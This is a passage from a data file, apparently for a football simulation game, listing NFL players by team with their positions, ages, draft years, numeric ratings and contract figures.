Fort,27,2012,69,65,86,84,82,78,0.3,1 LB,Vince Williams,28,2013,70,79,84,86,83,79,1.5,2 DL,Stephon Tuitt,24,2014,83,86,80,91,91,82,0.9,1 DL,Daniel McCullers,25,2014,81,73,80,88,88,72,0.4,1 LB,Ryan Shazier,25,2014,81,85,84,86,88,90,3,2 WR,Martavis Bryant,26,2014,81,81,87,83,93,79,0.5,1 OL,Chris Hubbard,26,2013,71,68,84,77,75,72,1.1,1 WR,Jesse James,23,2015,75,79,85,84,83,68,0.4,2 LB,Anthony Chickillo,25,2015,70,66,89,76,81,76,0.4,1 LB,Bud Dupree,24,2015,83,68,86,82,80,83,2.1,2 DL,Leterrius Walton,25,2015,74,73,83,85,84,78,0.4,2 OL,BJ Finney,26,2015,72,70,88,84,75,83,0.3,1 RB,Terrell Watson,24,2015,72,67,86,81,87,85,0.3,1 WR,Eli Rogers,25,2015,79,78,85,88,88,79,0.3,1 WR,Xavier Grimble,25,2014,78,67,82,76,75,68,0.3,1 K,Chris Boswell,26,2014,66,68,80,92,91,68,0.4,1 K,Jordan Berry,26,2014,66,64,80,91,83,64,0.3,1 RB,Roosevelt Nix,25,2014,71,75,87,71,79,73,0.4,1 OL,Alejandro Villanueva,29,2014,88,87,87,86,81,77,4.6,4 OL,Matt Feiler,25,2014,68,52,85,94,79,72,0.3,1 OL,Jerald Hawkins,24,2016,65,58,89,81,80,76,0.5,3 DL,Javon Hargrave,24,2016,84,77,88,85,85,86,0.6,3 CB,Mike Hilton,23,2016,83,78,84,85,87,76,0.3,1 LB,Tyler Matakevich,25,2016,72,58,91,83,84,76,0.4,3 CB,Artie Burns,22,2016,88,81,84,87,91,67,2.2,3 S,Sean Davis,24,2016,80,73,89,85,90,67,0.8,3 OL,Kameron Canaday,25,2016,68,52,87,69,48,75,0.3,1 QB,Joshua Dobbs,22,2017,68,66,87,91,76,83,0.5,4 RB,James Conner,22,2017,79,67,87,86,85,79,0.6,4 WR,JuJu Smith-Schuste,21,2017,81,73,92,85,88,81,0.8,4 CB,Brian Allen,24,2017,61,51,86,80,91,58,0.4,4 LB,TJ Watt,23,2017,82,68,86,86,84,81,2.1,4 CB,Cameron Sutton,22,2017,79,62,87,81,88,67,0.6,4 LB,Keion Adams,22,2017,71,51,88,76,83,76,0.4,4 END_PLAYERS ###################################################################### BILLS Buffalo Bills,BUF OL,Eric Wood,31,2009,82,88,87,88,75,72,6.5,3 DL,Kyle Williams,34,2006,60,87,85,90,92,81,5.3,1 WR,Charles Clay,28,2011,77,83,92,87,83,80,5.7,3 QB,Tyrod Taylor,28,2011,81,84,89,91,81,78,11.2,2 RB,Mike Tolbert,32,2008,76,85,88,83,77,77,0.6,1 DL,Jerry Hughes,29,2010,72,83,91,76,81,88,6.2,3 OL,Richie Incognito,34,2005,72,92,92,94,86,86,3.8,2 CB,Shareece Wright,30,2011,66,71,87,84,90,71,0.5,1 RB,LeSean McCoy,29,2009,74,88,85,81,90,86,6.4,3 S,Colt Anderson,32,2009,61,71,87,80,85,66,0.6,1 CB,Leonard Johnson,27,2012,74,70,88,83,86,70,0.6,1 OL,Vladimir Ducasse,30,2010,72,78,87,92,74,76,0.7,3 RB,Travaris Cadet,28,2012,69,68,85,76,87,83,0.5,1 DL,Cedric Thornton,29,2011,63,72,82,88,89,81,3.3,3 RB,Patrick DiMarco,28,2011,69,81,90,73,74,73,1.6,4 WR,Brandon Tate,30,2009,61,66,84,75,88,84,0.6,1 WR,Deonte Thompson,28,2012,61,71,80,79,92,77,0.6,1 LB,Lorenzo Alexander,34,2005,48,85,87,83,86,83,2.1,2 S,Shamarko Thomas,26,2013,66,63,86,84,90,70,0.5,1 QB,Joe Webb,31,2010,61,68,83,89,68,83,0.6,1 LB,Ramon Humber,30,2009,67,74,82,82,76,78,0.6,1 K,Steven Hauschka,32,2008,59,55,81,96,86,55,2.4,3 WR,Andre Holmes,29,2011,70,76,82,82,87,77,1.4,3 S,Micah Hyde,27,2013,75,83,86,86,88,73,4.6,5 OL,Jordan Mills,27,2013,68,76,86,84,72,75,1.3,2 OL,Cordy Glenn,28,2012,90,89,86,93,72,76,9.1,4 DL,Jerel Worthy,27,2012,71,68,83,82,86,82,0.4,1 DL,Ryan Davis,28,2012,59,66,83,74,75,83,0.7,2 S,Jordan Poyer,26,2013,86,86,85,85,87,56,2.5,4 CB,EJ Gaines,25,2014,85,83,86,85,89,75,0.5,1 WR,Jordan Matthews,25,2014,88,86,91,82,90,80,1,1 WR,Logan Thomas,26,2014,68,58,89,73,84,78,0.5,1 LB,Preston Brown,25,2014,83,82,93,81,84,83,0.7,1 WR,Kelvin Benjamin,26,2014,82,88,86,89,86,81,2.5,2 OL,Seantrel Henderson,25,2014,77,75,75,83,77,69,0.5,1 K,Colton Schmidt,27,2014,70,58,82,89,76,58,1,2 OL,Ryan Groy,27,2014,78,73,83,86,77,76,1.5,2 WR,Nick O'Leary,25,2015,69,68,88,84,75,66,0.3,1 OL,John Miller,24,2015,90,82,84,86,73,82,0.5,2 WR,Khari Lee,25,2015,75,61,86,74,76,73,0.4,2 WR,Jeremy Butler,26,2014,62,57,86,79,86,73,0.4,1 DL,Eddie Yarbrough,24,2016,80,65,78,82,83,86,0.3,1 DL,Shaq Lawson,23,2016,70,70,83,85,88,88,2.4,3 DL,Adolphus Washington,25,2016,71,67,84,75,82,86,0.6,3 CB,Lafayette Pitts,25,2016,74,58,87,80,90,62,0.3,1 QB,Nathan Peterman,23,2017,79,67,90,91,76,66,0.4,4 WR,Zay Jones,22,2017,73,70,93,88,90,81,1.5,4 OL,Dion Dawkins,23,2017,82,68,89,90,78,73,0.8,4 OL,Conor McDermott,25,2017,69,59,86,84,74,75,0.4,4 CB,Tre'Davious White,22,2017,88,77,89,85,90,81,2.3,4 LB,Matt Milano,23,2017,78,58,91,83,83,75,0.4,4 S,Trae Elston,23,2016,67,50,83,77,89,72,0.3,2 OL,Reid Ferguson,23,2016,73,50,87,50,46,75,0.3,2 LB,Deon Lacey,27,2013,69,63,84,75,77,77,0.4,2 LB,Tanner Vallejo,23,2017,72,55,83,84,82,75,0.4,4 END_PLAYERS ###################################################################### DOLPHINS Miami Dolphins,MIA QB,Jay Cutler,34,2006,59,75,80,95,77,50,6,1 LB,Rey Maualuga,30,2009,64,73,92,85,87,75,0.6,1 OL,John Denney,39,2005,76,87,87,74,52,65,0.6,1 OL,Ted Larsen,30,2010,80,72,88,79,80,73,1.4,3 OL,Mike Pouncey,28,2011,86,81,80,88,74,74,6,4 OL,Sam Young,30,2010,80,72,84,83,81,75,0.6,1 S,Reshad Jones,29,2010,79,93,84,89,86,84,7.9,6 WR,Anthony Fasano,33,2006,49,79,88,77,76,69,2.4,1 DL,Cameron Wake,35,2009,56,91,88,85,85,88,5.1,2 WR,Julius Thomas,29,2011,71,77,83,84,85,81,3.7,2 S,Nate Allen,30,2010,69,76,82,84,86,70,3.2,1 DL,Ndamukong Suh,30,2010,76,85,95,98,99,91,14.5,4 QB,Matt Moore,33,2007,73,78,91,84,78,50,1.3,1 LB,Kiko Alonso,27,2013,76,81,85,87,80,81,5.4,4 OL,Jermon Bushrod,33,2007,72,81,91,87,72,72,2.2,1 S,TJ McDonald,26,2013,78,77,85,85,86,66,0.2,5 LB,Lawrence Timmons,31,2007,75,86,90,86,84,84,5.2,2 CB,Alterraun Verner,29,2010,62,67,86,84,86,84,0.5,1 DL,William Hayes,32,2008,73,85,88,85,91,88,4,1 WR,Kenny Stills,25,2013,84,85,88,86,92,80,5.8,4 QB,Ryan Tannehill,29,2012,75,81,94,91,81,74,13.5,4 DL,Andre Branch,28,2012,73,77,79,71,75,84,6,3 S,Michael Thomas,27,2012,78,75,87,84,86,67,1.1,1 RB,MarQueis Gray,28,2013,66,70,85,74,81,78,0.7,2 CB,Walt Aikens,26,2014,69,65,87,82,89,68,0.5,1 DL,Terrence Fede,26,2014,69,57,86,76,80,85,0.3,1 OL,Ja'Wuan James,25,2014,84,84,86,84,73,80,2.8,2 QB,David Fales,27,2014,63,55,90,83,79,55,0.4,1 WR,Jarvis Landry,25,2014,89,87,91,96,91,88,0.6,1 K,Cody Parkey,25,2014,67,55,86,94,81,55,0.4,1 RB,Senorise Perry,26,2014,65,51,84,70,92,78,0.4,2 RB,Damien Williams,25,2014,79,73,85,82,91,83,1.1,1 WR,DeVante Parker,24,2015,90,87,87,89,91,80,2.5,2 DL,Jordan Phillips,25,2015,68,70,74,89,87,79,0.9,2 LB,Stephone Anthony,25,2015,75,69,83,84,83,82,1.7,2 CB,Bobby McCain,24,2015,85,78,86,86,89,66,0.4,2 LB,Mike Hull,26,2015,73,69,88,83,87,79,0.4,1 OL,Jesse Davis,26,2015,69,59,88,84,74,72,0.3,2 RB,Kenyan Drake,23,2016,76,65,82,73,91,81,0.6,3 WR,Leonte Carroo,23,2016,69,61,87,83,89,73,0.6,3 OL,Laremy Tunsil,23,2016,74,77,91,88,80,73,3,3 OL,Jake Brendel,25,2016,66,50,90,80,74,75,0.3,1 CB,Xavien Howard,24,2016,79,65,90,84,91,72,1.3,3 S,Jordan Lucas,24,2016,64,48,85,79,91,68,0.4,3 WR,Jakeem Grant,25,2016,58,51,84,80,96,75,0.4,3 OL,Isaac Asiata,25,2017,74,57,92,92,79,76,0.4,4 DL,Charles Harris,22,2017,74,68,85,76,79,88,2.5,4 DL,Vincent Taylor,23,2017,69,63,87,84,82,77,0.4,4 DL,Davon Godchaux,23,2017,82,67,85,85,84,81,0.4,4 CB,Cordrea Tankersley,24,2017,74,62,92,79,92,79,0.6,4 OL,Zach Sterup,25,2016,64,54,85,86,79,73,0.3,1 K,Matt Haack,23,2017,65,54,80,96,77,54,0.3,3 CB,Torry McTyer,22,2017,67,52,84,79,92,61,0.3,3 LB,Chase Allen,24,2017,70,65,88,83,82,79,0.3,3 S,Maurice Smith,22,2017,77,56,84,76,85,64,0.3,3 END_PLAYERS ###################################################################### PATRIOTS New England Patriots,NE DL,Alan Branch,33,2007,48,73,81,91,90,77,3.1,2 RB,Dion Lewis,27,2011,83,83,80,81,91,85,1,1 OL,Marcus Cannon,29,2011,88,87,79,92,85,73,4.7,5 OL,Nate Solder,29,2011,89,88,87,90,74,73,8.5,1 DL,Lawrence Guy,27,2011,80,81,88,84,86,81,2.6,4 WR,Martellus Bennett,30,2008,75,84,87,86,79,75,5.4,3 DL,Ricky Jean-Francois,31,2009,65,73,79,84,86,81,0.5,1 RB,James Develin,29,2010,75,84,87,69,70,65,0.8,2 LB,David Harris,33,2007,67,76,92,87,85,76,1.9,2 RB,Brandon Bolden,27,2012,72,71,86,80,88,80,0.5,1 S,Devin McCourty,30,2010,79,92,91,92,90,72,7.5,3 S,Patrick Chung,30,2009,69,83,94,85,86,72,2.1,2 QB,Tom Brady,40,2000,69,99,98,95,98,53,15,3 K,Stephen Gostkowski,33,2006,63,60,81,94,82,60,3.5,2 WR,Matthew Slater,32,2008,70,81,86,74,87,75,1.3,1 QB,Brian Hoyer,32,2009,70,77,82,90,78,47,4.8,2 WR,Julian Edelman,31,2009,75,96,89,90,86,86,4.4,3 WR,Danny Amendola,32,2008,71,85,87,89,84,80,2.7,1 S,Duron Harmon,26,2013,81,79,87,85,88,64,3.3,4 WR,Chris Hogan,29,2011,79,90,85,93,88,79,2.4,2 RB,Mike Gillislee,27,2013,81,81,87,86,88,85,1.9,2 CB,Stephon Gilmore,27,2012,80,81,89,88,92,69,9.9,5 LB,Shea McClellin,28,2012,64,78,84,82,77,78,2.3,2 LB,Dont'a Hightower,27,2012,80,90,91,94,93,83,6.8,4 WR,Dwayne Allen,27,2012,85,82,85,84,76,70,5,3 S,Nate Ebner,29,2012,64,62,95,80,87,74,0.7,1 RB,Rex Burkhead,27,2013,77,79,90,85,84,84,2.5,1 CB,Johnson Bademosi,27,2012,77,64,89,85,90,77,1.9,1 K,Ryan Allen,27,2013,74,59,84,91,80,59,1.6,2 OL,LaAdrian Waddle,26,2013,81,72,83,87,73,73,0.8,1 LB,Kyle Van Noy,26,2014,78,74,84,83,79,81,1.1,1 OL,Cameron Fleming,25,2014,78,72,84,85,74,79,1.1,1 DL,Cassius Marsh,25,2014,81,72,89,66,71,82,0.5,1 RB,James White,25,2014,79,78,83,82,89,83,2.5,4 LB,Marquis Flowers,25,2014,64,63,84,71,76,81,0.4,1 LB,Trevor Reilly,29,2014,64,64,86,76,80,75,0.4,1 WR,Brandin Cooks,24,2014,91,87,88,90,96,83,2.5,2 CB,Malcolm Butler,27,2014,88,90,85,90,89,81,2.3,1 WR,Phillip Dorsett,24,2015,84,72,78,84,96,78,1.8,2 OL,Shaq Mason,24,2015,84,86,85,87,92,75,0.5,2 OL,Joe Cardona,25,2015,61,48,86,82,46,67,0.4,2 DL,Trey Flowers,24,2015,75,80,89,87,89,86,0.5,2 DL,Malcom Brown,23,2015,86,82,82,85,87,81,1.7,2 CB,Eric Rowe,25,2015,69,66,85,85,91,77,1,2 S,Jordan Richards,24,2015,76,59,90,81,86,73,0.7,2 S,Brandon King,24,2015,74,61,83,81,89,54,0.4,1 OL,David Andrews,25,2015,84,88,88,86,85,73,1.7,4 OL,Ted Karras,24,2016,69,54,90,86,80,75,0.4,3 CB,Jonathan Jones,24,2016,81,62,78,82,95,61,0.3,2 OL,Joe Thuney,25,2016,83,83,90,86,74,78,0.6,3 LB,Elandon Roberts,23,2016,86,73,86,86,87,79,0.4,3 DL,Deatrich Wise Jr.,23,2017,71,69,81,85,86,83,0.5,4 OL,Cole Croston,24,2017,69,53,85,82,78,72,0.3,3 WR,Jacob Hollister,24,2017,71,58,88,78,84,78,0.3,3 END_PLAYERS ###################################################################### JETS New York Jets,NYJ RB,Matt Forte,32,2008,69,79,89,88,87,84,3,2 CB,Buster Skrine,28,2011,71,77,85,86,91,72,4.5,2 OL,Ben Ijalana,28,2011,70,64,85,86,75,73,3.7,2 OL,James Carpenter,28,2011,75,78,87,90,73,79,3.4,2 WR,Jeremy Kerley,29,2011,73,78,86,86,86,80,0.5,1 DL,Muhammad Wilkerson,28,2011,70,82,92,94,97,88,12.1,4 LB,Bruce Carter,29,2011,69,72,77,83,82,83,0.5,1 RB,Bilal Powell,29,2011,78,88,85,86,88,84,2.8,2 QB,Josh McCown,38,2002,46,84,83,85,79,50,5.4,1 OL,Brian Winters,26,2013,84,84,87,84,73,74,4.3,4 DL,Steve McLendon,31,2009,67,77,84,86,91,82,2.5,2 CB,Morris Claiborne,27,2012,72,74,82,86,90,61,4.2,1 LB,Demario Davis,28,2012,68,80,85,86,89,84,1.4,1 OL,Kelvin Beachum,28,2012,84,82,86,84,74,78,5.7,3 LB,Julian Stanford,27,2012,74,66,80,79,82,84,0.4,1 WR,Jermaine Kearse,27,2012,78,86,92,86,90,79,3.8,2 DL,David Bass,27,2013,78,67,86,75,74,82,0.5,1 LB,Josh Martin,26,2013,70,62,84,76,80,75,1.3,2 S,Rontez Miles,29,2013,60,67,89,82,85,73,0.3,1 DL,Ed Stinson,27,2014,67,63,80,88,85,74,0.4,1 OL,Wesley Johnson,26,2014,75,77,90,83,73,71,1.6,1 WR,Austin S-Jenkins,25,2014,72,71,81,83,87,73,1.1,1 S,Terrence Brooks,25,2014,73,69,83,84,91,62,0.4,1 OL,Dakota Dozier,26,2014,67,71,87,83,79,73,0.4,1 DL,Kony Ealy,26,2014,84,78,85,81,82,88,0.5,1 K,Chandler Catanzaro,26,2014,63,57,82,95,82,57,0.5,1 CB,Robert Nelson,27,2014,73,62,86,82,90,71,0.3,1 DL,Mike Pennel,26,2014,70,67,83,87,85,77,0.6,1 OL,Jonotthan Harrison,26,2014,76,74,86,87,72,72,0.5,1 OL,Brent Qvale,26,2014,71,67,87,76,77,73,0.3,1 QB,Bryce Petty,26,2015,65,61,83,91,75,63,0.5,2 WR,Neal Sterling,25,2015,66,55,85,75,85,79,0.4,1 DL,Obum Gwacham,26,2015,66,58,81,74,74,84,0.4,2 DL,Leonard Williams,23,2015,89,84,82,87,90,86,4.6,2 DL,Xavier Cooper,26,2015,69,67,87,83,81,82,0.5,2 LB,Lorenzo Mauldin,25,2015,67,69,84,79,81,77,0.6,2 CB,Darryl Roberts,27,2015,75,65,79,86,92,55,0.4,2 WR,Eric Tomlinson,25,2015,73,64,85,77,80,62,0.3,1 QB,Christian Hackenberg,22,2016,72,66,87,95,70,55,0.9,3 OL,Brandon Shell,25,2016,79,70,90,82,73,73,0.4,3 LB,Darron Lee,23,2016,73,74,89,80,79,84,2.4,3 LB,Jordan Jenkins,23,2016,77,72,81,82,86,78,0.6,3 CB,Juston Burris,24,2016,70,63,90,82,88,74,0.5,3 CB,Rashard Robinson,22,2016,74,76,90,86,93,55,0.5,3 K,Lachlan Edwards,25,2016,60,54,80,91,75,54,0.4,3 RB,Lawrence Thomas,24,2016,70,65,85,59,73,63,0.3,2 WR,Robby Anderson,24,2016,85,76,82,83,94,74,0.3,2 LB,Freddie Bishop,27,2013,69,54,89,77,83,74,0.3,1 WR,ArDarius Stewart,24,2017,72,67,86,83,89,81,0.6,4 S,Marcus Maye,24,2017,76,68,86,82,90,77,1.4,4 S,Jamal Adams,22,2017,82,74,90,83,91,81,5.5,4 WR,Chad Hansen,22,2017,67,61,86,84,89,73,0.5,4 RB,Elijah McGuire,23,2017,74,57,87,86,89,88,0.4,4 CB,Derrick Jones,23,2017,71,50,85,79,90,62,0.4,4 OL,Thomas Hennessy,23,2017,66,57,83,64,46,69,0.3,3 END_PLAYERS ###################################################################### TEXANS Houston Texans,HOU CB,Johnathan Joseph,33,2006,74,87,84,89,89,68,4,1 OL,Jon Weeks,31,2010,67,74,85,69,48,65,0.6,3 OL,Chris Clark,32,2008,76,77,80,86,77,73,2.1,1 QB,Josh Johnson,31,2008,67,62,86,87,72,66,0.5,1 OL,Derek Newton,30,2011,77,84,84,87,83,72,2.9,3 RB,Jordan Todman,27,2011,69,60,82,77,89,83,0.5,1 S,Marcus Gilchrist,29,2011,75,79,89,88,88,79,2.3,1 S,Eddie Pleasant,29,2012,71,75,91,81,87,73,0.6,1 LB,Lamarr Houston,30,2010,69,82,82,82,87,76,0.5,1 K,Shane Lechler,41,2000,47,69,81,88,86,69,1.5,1 WR,DeAndre Hopkins,25,2013,91,93,93,93,92,81,2.4,5 CB,Kareem Jackson,29,2010,65,79,83,83,89,72,6.4,2 LB,Brian Cushing,30,2009,75,85,91,82,85,81,6.1,3 LB,Jelani Jenkins,25,2013,82,75,87,79,79,83,0.5,1 OL,Breno Giacomini,32,2008,75,72,87,84,86,70,2.1,1 LB,Whitney Mercilus,27,2012,86,84,87,87,84,81,4.7,3 OL,Jeff Allen,27,2012,72,74,81,87,73,72,4.5,3 RB,Lamar Miller,26,2012,89,87,85,87,92,90,4,3 WR,Ryan Griffin,27,2013,76,72,86,82,75,72,1.8,3 LB,Jadeveon Clowney,24,2014,82,79,80,84,85,86,6.5,2 WR,CJ Fiedorowicz,26,2014,85,80,91,85,81,67,0.7,1 OL,Xavier Su'a-Filo,26,2014,79,73,88,85,74,72,1.2,1 S,Andre Hal,25,2014,78,82,86,87,92,58,0.5,1 QB,Tom Savage,27,2014,66,66,87,93,74,55,0.4,1 RB,Alfred Blue,26,2014,76,76,80,83,87,79,0.4,1 RB,Jay Prosch,25,2014,79,75,92,72,81,67,0.4,1 WR,Bruce Ellington,26,2014,78,76,89,84,91,83,0.4,1 DL,Brandon Dunn,25,2014,80,72,85,78,81,75,0.4,2 CB,Marcus Williams,26,2014,67,68,88,81,87,53,1.6,1 DL,Christian Covington,24,2015,77,73,77,78,80,80,0.4,2 LB,Benardrick McKinney,25,2015,81,81,88,87,81,84,1.1,2 CB,Kevin Johnson,25,2015,76,78,86,88,88,74,2.3,2 S,Kurtis Drummond,25,2015,74,66,86,82,85,54,0.3,1 OL,Greg Mancz,25,2015,72,68,88,87,72,77,0.3,1 OL,Kendall Lamm,25,2015,74,69,88,77,82,72,0.3,1 S,Corey Moore,24,2015,87,79,88,82,87,63,0.3,1 LB,Brian Peters,29,2015,61,63,87,74,73,78,0.3,1 WR,Will Fuller,23,2016,78,80,85,79,95,79,2.4,3 WR,Braxton Miller,25,2016,68,63,85,82,91,83,0.6,3 OL,Nick Martin,24,2016,76,78,86,85,75,76,1,3 K,Ka'lmi Fairbairn,23,2016,61,48,80,88,87,48,0.3,2 DL,DJ Reader,23,2016,83,81,86,87,86,79,0.4,3 DL,Joel Heath,24,2016,80,71,85,82,82,81,0.3,2 LB,Brennan Scarlett,24,2016,69,65,79,72,79,77,0.3,2 WR,Stephen Anderson,24,2016,71,55,85,75,84,71,0.3,2 LB,Ufomba Kamalu,25,2016,68,57,87,80,84,71,0.3,1 QB,Deshaun Watson,22,2017,82,79,91,88,79,78,3.3,4 RB,D'onta Foreman,21,2017,85,78,87,84,90,85,0.6,4 OL,Julie'n Davenport,22,2017,79,63,86,85,77,77,0.5,4 OL,Kyle Fuller,23,2017,64,55,88,81,74,74,0.4,4 DL,Carlos Watkins,24,2017,76,56,87,86,84,83,0.5,4 LB,Zach Cunningham,23,2017,82,75,90,84,84,83,0.9,4 LB,Dylan Cole,23,2017,64,58,87,81,86,80,0.3,3 CB,Treston Decoud,24,2017,72,56,84,78,87,77,0.4,4 END_PLAYERS ###################################################################### COLTS Indianapolis Colts,IND DL,Al Woods,30,2010,70,75,82,93,92,78,1.2,2 OL,Anthony Castonzo,29,2011,81,89,85,89,93,73,6.9,3 LB,Jabaal Sheard,28,2011,79,87,90,88,86,81,5.1,3 K,Adam Vinatieri,45,1996,55,72,84,88,94,72,1.8,1 OL,Mike Person,29,2011,67,69,81,79,75,78,0.5,1 RB,Frank Gore,34,2005,71,94,90,84,82,82,2.4,1 S,Darius Butler,31,2009,65,79,90,86,89,60,2.7,1 LB,Barkevious Mingo,27,2013,79,72,87,83,79,84,1.5,1 DL,Johnathan Hankins,25,2013,80,86,83,93,93,81,5.4,3 LB,Jon Bostic,26,2013,76,72,86,82,80,78,0.4,1 DL,Margus Hunt,30,2013,62,70,84,85,82,83,1.2,2 QB,Scott Tolzien,30,2011,68,65,90,83,77,52,1.2,1 WR,Kamar Aiken,28,2011,66,78,82,86,89,80,2.2,1 LB,John Simon,27,2013,84,78,88,83,86,80,2.7,3 QB,Andrew Luck,28,2012,87,85,90,95,87,75,18.6,5 WR,TY Hilton,28,2012,78,95,88,92,94,82,8.8,4 RB,Robert Turbin,28,2012,66,72,87,84,90,83,0.8,2 CB,Rashaan Melvin,28,2013,71,84,83,89,90,64,0.4,1 WR,Jack Doyle,27,2013,76,83,84,88,77,66,3.8,3 WR,Brandon Williams,30,2013,67,66,80,73,86,71,0.5,1 CB,Pierre Desir,27,2014,74,62,86,83,88,62,0.5,1 WR,Donte Moncrief,24,2014,77,78,87,88,92,80,0.7,1 LB,Jeremiah George,25,2014,72,66,87,84,83,79,0.4,2 OL,Jack Mewhort,26,2014,82,81,88,89,72,79,0.7,1 RB,Matt Jones,24,2015,76,73,80,79,89,83,0.5,2 OL,Denzelle Good,26,2015,74,77,79,87,79,82,0.4,2 DL,Henry Anderson,26,2015,80,83,81,83,86,83,0.5,2 S,Clayton Geathers,25,2015,83,80,87,84,87,78,0.5,2 OL,Tyreek Burwell,25,2015,61,53,83,82,77,71,0.4,1 WR,Erik Swoope,25,2014,68,59,80,75,80,79,0.3,1 OL,Jeremy Vujnovich,27,2014,72,54,82,90,73,73,0.3,1 QB,Jacoby Brissett,24,2016,74,72,90,94,78,77,0.6,3 OL,Le'Raven Clark,24,2016,72,59,89,81,80,72,0.6,3 OL,Joe Haeg,24,2016,74,73,91,83,75,73,0.4,3 OL,Ryan Kelly,24,2016,86,84,89,86,77,79,2.4,3 DL,Hassan Ridgeway,23,2016,71,56,78,87,88,85,0.5,3 LB,Joshua Perry,23,2016,75,58,90,85,84,75,0.5,3 LB,Antonio Morrison,23,2016,75,67,83,82,83,77,0.5,3 CB,DJ White,24,2016,66,54,89,81,89,69,0.4,3 S,TJ Green,22,2016,71,63,86,83,93,74,0.8,3 WR,Chester Rogers,23,2016,81,70,85,83,89,78,0.3,2 CB,Chris Milton,25,2016,72,55,89,79,92,76,0.3,1 S,Matthias Farley,25,2016,73,74,88,83,89,72,0.3,2 RB,Marlon Mack,21,2017,71,69,87,73,89,80,0.5,4 S,Malik Hooker,21,2017,76,74,85,86,88,71,3,4 OL,Kyle Kalis,24,2017,69,56,84,88,73,74,0.3,3 LB,Tarell Basham,23,2017,81,64,89,78,80,76,0.6,4 LB,Anthony Walker Jr.,22,2017,74,58,93,83,84,74,0.4,4 CB,Quincy Wilson,21,2017,74,62,88,79,88,67,1.2,4 OL,Luke Rhodes,25,2016,71,54,88,83,46,45,0.3,1 RB,Darrell Daniels,23,2017,73,57,86,71,86,78,0.3,3 DL,Grover Stewart,24,2017,69,55,89,90,86,77,0.5,4 CB,Nate Hairston,23,2017,74,63,86,83,88,72,0.4,4 K,Rigoberto Sanchez,23,2017,63,55,88,92,83,55,0.3,3 CB,Kenny Moore,22,2017,69,56,85,82,87,63,0.3,3 END_PLAYERS ###################################################################### JAGUARS Jacksonville Jaguars,JAX LB,Paul Posluszny,33,2007,52,88,92,86,84,82,3.5,1 WR,Arrelious Benn,29,2010,71,71,80,75,84,78,0.6,2 DL,Calais Campbell,31,2008,73,91,91,87,93,90,9.9,4 DL,Marcell Dareus,27,2011,84,82,89,94,96,87,9.6,5 S,Barry Church,29,2010,70,74,94,80,85,79,3.9,4 OL,Jermey Parnell,31,2009,75,81,82,84,73,76,3.8,3 QB,Chad Henne,32,2008,72,76,89,88,74,42,2.4,1 WR,Marcedes Lewis,33,2006,72,82,86,78,74,65,2.4,2 RB,Chris Ivory,29,2010,73,85,79,85,89,85,4.4,4 DL,Malik Jackson,27,2012,74,79,87,83,88,84,9.5,5 K,Brad Nortman,28,2012,67,62,84,90,82,62,1.3,3 OL,Matt Overton,32,2010,56,60,83,66,57,70,0.5,1 S,Tashaun Gipson,27,2012,85,83,90,85,84,67,4.8,4 S,Peyton Thompson,27,2012,75,62,83,81,88,50,0.4,1 RB,Tommy Bohanon,27,2013,72,70,85,71,76,68,0.4,1 CB,AJ Bouye,26,2013,86,87,82,89,89,71,9.3,5 DL,Abry Jones,26,2013,86,81,84,88,87,77,2.3,4 LB,Lerentee McCray,27,2013,75,67,80,74,75,78,1.2,1 OL,Patrick Omameh,28,2013,75,79,87,82,73,82,0.6,1 WR,Marqise Lee,26,2014,78,83,87,86,89,81,1.1,1 WR,Allen Robinson,24,2014,94,90,87,89,90,81,0.7,1 OL,Brandon Linder,25,2014,76,89,88,89,80,74,5.3,6 LB,Telvin Smith,26,2014,85,89,85,87,79,86,0.6,1 QB,Blake Bortles,25,2014,83,77,95,93,78,75,6.8,2 S,Calvin Pryor,25,2014,76,74,91,83,87,71,0.9,1 CB,Aaron Colvin,26,2014,83,79,79,86,89,72,0.6,1 CB,Tyler Patmon,26,2014,71,65,83,82,88,59,0.4,1 OL,Josh Wells,26,2014,62,63,84,83,79,74,0.5,2 WR,Allen Hurns,26,2014,86,86,89,86,88,81,4.9,4 OL,Tyler Shatley,26,2014,64,64,84,95,77,74,0.6,2 RB,TJ Yeldon,24,2015,85,78,83,86,88,86,1.3,2 WR,Jaelen Strong,23,2015,69,58,83,86,91,76,0.6,2 WR,Ben Koyack,24,2015,84,69,86,78,79,67,0.3,1 WR,James O'Shaughnessy,25,2015,63,54,81,79,83,77,0.4,2 OL,AJ Cann,26,2015,77,80,87,89,73,74,0.6,2 DL,Dante Fowler Jr.,23,2015,74,76,79,73,81,90,5.8,2 OL,Chris Reed,25,2015,68,61,82,85,75,76,0.3,1 K,Josh Lambo,27,2015,62,58,81,93,84,58,0.4,1 RB,Corey Grant,26,2015,78,68,77,73,96,78,0.3,1 OL,Josh Walker,26,2014,68,53,87,76,79,75,0.4,1 OL,William Poehls,26,2014,76,65,86,80,77,74,0.3,1 DL,Sheldon Day,23,2016,68,66,87,80,85,89,0.5,3 LB,Myles Jack,22,2016,88,81,83,84,82,87,1.4,3 DL,Yannick Ngakoue,22,2016,84,80,87,80,84,89,0.6,3 S,Jarrod Wilson,23,2016,75,55,88,78,87,63,0.3,2 RB,Leonard Fournette,22,2017,86,82,85,92,91,89,6.7,4 OL,Cam Robinson,22,2017,76,73,93,91,77,76,1.5,4 WR,Dede Westbrook,24,2017,69,59,84,86,93,80,0.6,4 DL,Dawuane Smoot,22,2017,75,64,90,82,81,86,0.7,4 LB,Blair Brown,23,2017,68,59,90,86,87,78,0.4,4 CB,Jalen Myrick,22,2017,74,51,83,81,96,76,0.4,4 LB,Donald Payne,23,2017,70,54,89,81,77,80,0.3,3 DL,Eli Ankou,23,2017,75,68,84,82,84,82,0.3,3 WR,Keelan Cole,24,2017,70,63,87,81,87,83,0.3,3 END_PLAYERS ###################################################################### TITANS Tennessee Titans,TEN OL,Beau Brinkley,27,2012,56,45,84,69,50,62,0.8,3 WR,Eric Decker,30,2010,69,85,90,91,86,80,0.5,1 LB,Wesley Woodyard,31,2008,74,88,92,88,80,85,0.5,3 RB,Demarco Murray,29,2011,77,89,86,85,89,88,0.5,7 K,Ryan Succop,31,2009,65,70,85,90,93,70,0.5,5 DL,Jurrell Casey,28,2011,74,88,88,92,94,85,8.8,6 S,Da'Norris Searcy,29,2011,66,74,88,83,87,72,0.5,8 WR,Harry Douglas,33,2008,62,75,86,83,88,79,0.5,5 WR,Eric Weems,32,2007,74,80,83,79,85,79,0.8,2 WR,Delanie Walker,33,2006,64,94,85,91,85,80,0.5,2 LB,Erik Walden,32,2008,72,76,87,80,80,77,0.5,2 DL,Karl Klug,29,2011,73,79,84,81,83,82,0.5,4 DL,Sylvester Williams,29,2013,66,73,84,86,84,80,0.5,7 S,Johnathan Cyprien,27,2013,84,84,90,87,89,77,0.5,8 